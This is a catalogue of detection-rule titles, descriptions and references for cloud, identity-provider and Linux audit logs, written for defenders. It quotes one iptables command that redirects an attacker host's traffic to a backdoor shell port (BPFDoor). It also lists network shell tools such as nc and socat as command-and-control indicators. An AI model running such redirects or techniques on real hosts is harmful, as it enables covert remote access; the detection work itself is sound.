https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts |
Google Cloud SQL Database Modified or Deleted |
Detect when a Cloud SQL DB has been modified or deleted. |
https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update |
Google Cloud VPN Tunnel Modified or Deleted |
Identifies when a VPN Tunnel Modified or Deleted in Google Cloud. |
https://any-api.com/googleapis_com/compute/docs/vpnTunnels |
Google Workspace Application Access Level Modified |
Detects when an access level is changed for a Google workspace application.
An access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model.
An adversary would be able to remove access levels to gain easier access to Google workspace resources.
|
https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings, https://support.google.com/a/answer/9261439 |
Google Workspace Application Removed |
Detects when an an application is removed from Google Workspace. |
https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST |
Google Workspace Granted Domain API Access |
Detects when an API access service account is granted domain authority. |
https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS |
Google Workspace MFA Disabled |
Detects when multi-factor authentication (MFA) is disabled. |
https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION |
Google Workspace Role Modified or Deleted |
Detects when an a role is modified or deleted in Google Workspace. |
https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings |
Google Workspace Role Privilege Deleted |
Detects when an a role privilege is deleted in Google Workspace. |
https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings |
Google Workspace User Granted Admin Privileges |
Detects when an Google Workspace user is granted admin privileges. |
https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE |
Github Delete Action Invoked |
Detects delete action in the Github audit logs for codespaces, environment, project and repo. |
https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions |
Outdated Dependency Or Vulnerability Alert Disabled |
Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts.
This rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories.
|
https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization |
Github High Risk Configuration Disabled |
Detects when a user disables a critical security feature for an organization. |
https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions, https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository, https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise |
Github Fork Private Repositories Setting Enabled/Cleared |
Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).
|
https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#private_repository_forking |
New Github Organization Member Added |
Detects when a new member is added or invited to a github organization. |
https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions |
Github New Secret Created |
Detects when a user creates action secret for the organization, environment, codespaces or repository. |
https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions |
Github Outside Collaborator Detected |
Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.
|
https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization |
Github Push Protection Bypass Detected |
Detects when a user bypasses the push protection on a secret detected by secret scanning. |
https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations, https://thehackernews.com/2024/03/github-rolls-out-default-secret.html |
Github Push Protection Disabled |
Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules. |
https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations, https://thehackernews.com/2024/03/github-rolls-out-default-secret.html |
Github Repository/Organization Transferred |
Detects when a repository or an organization is being transferred to another location. |
https://docs.github.com/en/repositories/creating-and-managing-repositories/transferring-a-repository, https://docs.github.com/en/organizations/managing-organization-settings/transferring-organization-ownership, https://docs.github.com/en/migrations, https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#migration |
Github Secret Scanning Feature Disabled |
Detects if the secret scanning feature is disabled for an enterprise or repository. |
https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/about-secret-scanning |
Github Self Hosted Runner Changes Detected |
A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com.
This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected,
it should be validated from GitHub UI because the log entry may not provide full context.
|
https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation |
Github SSH Certificate Configuration Changed |
Detects when changes are made to the SSH certificate configuration of the organization. |
https://docs.github.com/en/enterprise-cloud@latest/organizations/managing-git-access-to-your-organizations-repositories/about-ssh-certificate-authorities, https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#ssh_certificate_authority |
Azure Login Bypassing Conditional Access Policies |
Detects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and InTune device trust using a tool like TokenSmith.
|
https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/, https://github.com/JumpsecLabs/TokenSmith |
Disabling Multi Factor Authentication |
Detects disabling of Multi Factor Authentication. |
https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/ |
New Federated Domain Added |
Detects the addition of a new Federated Domain. |
https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/, https://o365blog.com/post/aadbackdoor/ |
New Federated Domain Added - Exchange |
Detects the addition of a new Federated Domain. |
https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf, https://us-cert.cisa.gov/ncas/alerts/aa21-008a, https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html, https://www.sygnia.co/golden-saml-advisory, https://o365blog.com/post/aadbackdoor/ |
Activity from Suspicious IP Addresses |
Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.
These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.
|
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Activity Performed by Terminated User |
Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.
This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.
|
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Activity from Anonymous IP Addresses |
Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Data Exfiltration to Unsanctioned Apps |
Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Activity from Infrequent Country |
Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Microsoft 365 - Impossible Travel Activity |
Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Logon from a Risky IP Address |
Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Microsoft 365 - Potential Ransomware Activity |
Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
PST Export Alert Using eDiscovery Alert |
Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content |
https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide |
PST Export Alert Using New-ComplianceSearchAction |
Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud. |
https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps |
Suspicious Inbox Forwarding |
Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Suspicious OAuth App File Download Activities |
Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Microsoft 365 - Unusual Volume of File Deletion |
Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Microsoft 365 - User Restricted from Sending Email |
Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Okta Admin Functions Access Through Proxy |
Detects access to Okta admin functions through proxy. |
https://www.beyondtrust.com/blog/entry/okta-support-unit-breach, https://dataconomy.com/2023/10/23/okta-data-breach/, https://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/ |
Okta Admin Role Assigned to an User or Group |
Detects when an the Administrator role is assigned to an user or group. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta Admin Role Assignment Created |
Detects when a new admin role assignment is created. Which could be a sign of privilege escalation or persistence |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta API Token Created |
Detects when a API token is created |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta API Token Revoked |
Detects when a API Token is revoked. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta Application Modified or Deleted |
Detects when an application is modified or deleted. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta Application Sign-On Policy Modified or Deleted |
Detects when an application Sign-on Policy is modified or deleted. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta FastPass Phishing Detection |
Detects when Okta FastPass prevents a known phishing site. |
https://sec.okta.com/fastpassphishingdetection, https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta Identity Provider Created |
Detects when a new identity provider is created for Okta. |
https://developer.okta.com/docs/reference/api/system-log/, https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection |
Okta Network Zone Deactivated or Deleted |
Detects when an Network Zone is Deactivated or Deleted. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta MFA Reset or Deactivated |
Detects when an attempt at deactivating or resetting MFA. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta New Admin Console Behaviours |
Detects when Okta identifies new activity in the Admin Console. |
https://developer.okta.com/docs/reference/api/system-log/, https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection |
Potential Okta Password in AlternateID Field |
Detects when a user has potentially entered their password into the
username field, which will cause the password to be retained in log files.
|
https://developer.okta.com/docs/reference/api/system-log/, https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data, https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm |
Okta Policy Rule Modified or Deleted |
Detects when an Policy Rule is Modified or Deleted. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta Policy Modified or Deleted |
Detects when an Okta policy is modified or deleted. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta Security Threat Detected |
Detects when an security threat is detected in Okta. |
https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm, https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta Suspicious Activity Reported by End-user |
Detects when an Okta end-user reports activity by their account as being potentially suspicious. |
https://developer.okta.com/docs/reference/api/system-log/, https://github.com/okta/workflows-templates/blob/master/workflows/suspicious_activity_reported/readme.md |
Okta Unauthorized Access to App |
Detects when unauthorized access to app occurs. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta User Account Locked Out |
Detects when an user account is locked out. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
New Okta User Created |
Detects new user account creation |
https://developer.okta.com/docs/reference/api/event-types/ |
Okta User Session Start Via An Anonymising Proxy Service |
Detects when an Okta user session starts where the user is behind an anonymising proxy service. |
https://developer.okta.com/docs/reference/api/system-log/, https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection |
OneLogin User Assumed Another User |
Detects when an user assumed another user account. |
https://developers.onelogin.com/api-docs/1/events/event-resource |
OneLogin User Account Locked |
Detects when an user account is locked or suspended. |
https://developers.onelogin.com/api-docs/1/events/event-resource/ |
Default Credentials Usage |
Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.
Sigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.
|
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists |
Host Without Firewall |
Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management. |
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf |
Cleartext Protocol Usage Via Netflow |
Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels
Ensure that an encryption is used for all sensitive information in transit.
Ensure that an encrypted channels is used for all administrative account access.
|
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf |
Audio Capture |
Detects attempts to record audio with arecord utility |
https://linux.die.net/man/1/arecord, https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa |
Auditing Configuration Changes on Linux Host |
Detect changes in auditd configuration files |
https://github.com/Neo23x0/auditd/blob/master/audit.rules, Self Experience |
Binary Padding - Linux |
Adversaries may use binary padding to add junk data and change the on-disk representation of malware.
This rule detect using dd and truncate to add a junk data to file.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md |
BPFDoor Abnormal Process ID or Lock File Accessed |
detects BPFDoor .lock and .pid files access in temporary file storage facility |
https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/, https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor |
Bpfdoor TCP Ports Redirect |
All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'
The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.
|
https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/, https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor |
Linux Capabilities Discovery |
Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges. |
https://man7.org/linux/man-pages/man8/getcap.8.html, https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/, https://mn3m.info/posts/suid-vs-capabilities/, https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099 |
File Time Attribute Change - Linux |
Detect file time attribute change to hide new or changes to existing files. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md |
Remove Immutable File Attribute - Auditd |
Detects removing immutable file attribute. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md |
Clipboard Collection with Xclip Tool - Auditd |
Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.
Xclip has to be installed.
Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
|
https://linux.die.net/man/1/xclip, https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/ |
Clipboard Collection of Image Data with Xclip Tool |
Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.
Xclip has to be installed.
Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
|
https://linux.die.net/man/1/xclip |
Possible Coin Miner CPU Priority Param |
Detects command line parameter very often used with coin miners |
https://xmrig.com/docs/miner/command-line-options |
Creation Of An User Account |
Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. |
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files, https://access.redhat.com/articles/4409591#audit-record-types-2, https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07 |
Data Compressed |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. |
https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md |
Data Exfiltration with Wget |
Detects attempts to post the file with the usage of wget utility.
The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.
|
https://linux.die.net/man/1/wget, https://gtfobins.github.io/gtfobins/wget/ |
Overwriting the File with Dev Zero or Null |
Detects overwriting (effectively wiping/deleting) of a file. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md |
Disable System Firewall |
Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md, https://firewalld.org/documentation/man-pages/firewall-cmd.html |
File or Folder Permissions Change |
Detects file and folder permission changes. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md |
Credentials In Files - Linux |
Detecting attempts to extract passwords with grep |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md |
Use Of Hidden Paths Or Files |
Detects calls to hidden files or files located in hidden directories in NIX systems. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md |
Hidden Files and Directories |
Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md |
Steganography Hide Zip Information in Picture File |
Detects appending of zip file to image |
https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ |
Linux Keylogging with Pam.d |
Detect attempt to enable auditing of TTY input |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md, https://linux.die.net/man/8/pam_tty_audit, https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing, https://access.redhat.com/articles/4409591#audit-record-types-2 |
Modification of ld.so.preload |
Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md, https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html |
Loading of Kernel Module via Insmod |
Detects loading of kernel modules with insmod command.
Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.
Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md, https://linux.die.net/man/8/insmod, https://man7.org/linux/man-pages/man8/kmod.8.html |
Logging Configuration Changes on Linux Host |
Detect changes of syslog daemons configuration files |
self experience |
Masquerading as Linux Crond Process |
Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.
Several different variations of this technique have been observed.
|
https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process |
Modify System Firewall |
Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access.
Detection rules that match only on the disabling of firewalls will miss this.
|
https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html, https://blog.aquasec.com/container-security-tnt-container-attack |
Linux Network Service Scanning - Auditd |
Detects enumeration of local or remote network services. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md |
Network Sniffing - Linux |
Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md |
Password Policy Discovery - Linux |
Detects password policy discovery commands |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md, https://linux.die.net/man/1/chage, https://man7.org/linux/man-pages/man1/passwd.1.html, https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu |
Systemd Service Reload or Start |
Detects a reload or a start of a service. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md |
Screen Capture with Import Tool |
Detects adversary creating screen capture of a desktop with Import Tool.
Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.
ImageMagick must be installed.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md, https://linux.die.net/man/1/import, https://imagemagick.org/ |
Screen Capture with Xwd |
Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture, https://linux.die.net/man/1/xwd |
Split A File Into Pieces - Linux |
Detection use of the command "split" to split files into parts and possible transfer. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md |
Steganography Hide Files with Steghide |
Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. |
https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ |
Steganography Extract Files with Steghide |
Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. |
https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ |
Suspicious C2 Activities |
Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.
This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.
These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)
|
https://github.com/Neo23x0/auditd |
Suspicious Commands Linux |
Detects relevant commands often related to malware or hacking activity |
Internal Research - mostly derived from exploit code including code in MSF |
Program Executions in Suspicious Folders |
Detects program executions in suspicious non-program folders related to malware or hacking activity |
Internal Research |
Suspicious History File Operations - Linux |
Detects commandline operations on shell history files |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md |
Systemd Service Creation |
Detects a creation of systemd services which could be used by adversaries to execute malicious code. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md |
System Information Discovery - Auditd |
Detects System Information Discovery commands |
https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md |
System and Hardware Information Discovery |
Detects system information discovery commands |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware |
System Shutdown/Reboot - Linux |
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md |
Unix Shell Configuration Modification |
Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened. |
https://objective-see.org/blog/blog_0x68.html, https://web.archive.org/web/20221204161143/https://www.glitch-cat.com/p/green-lambert-and-attack, https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat |
Steganography Unzip Hidden Information From Picture File |
Detects extracting of zip file from image file |
https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ |
System Owner or User Discovery - Linux |
Detects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc.
Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md |
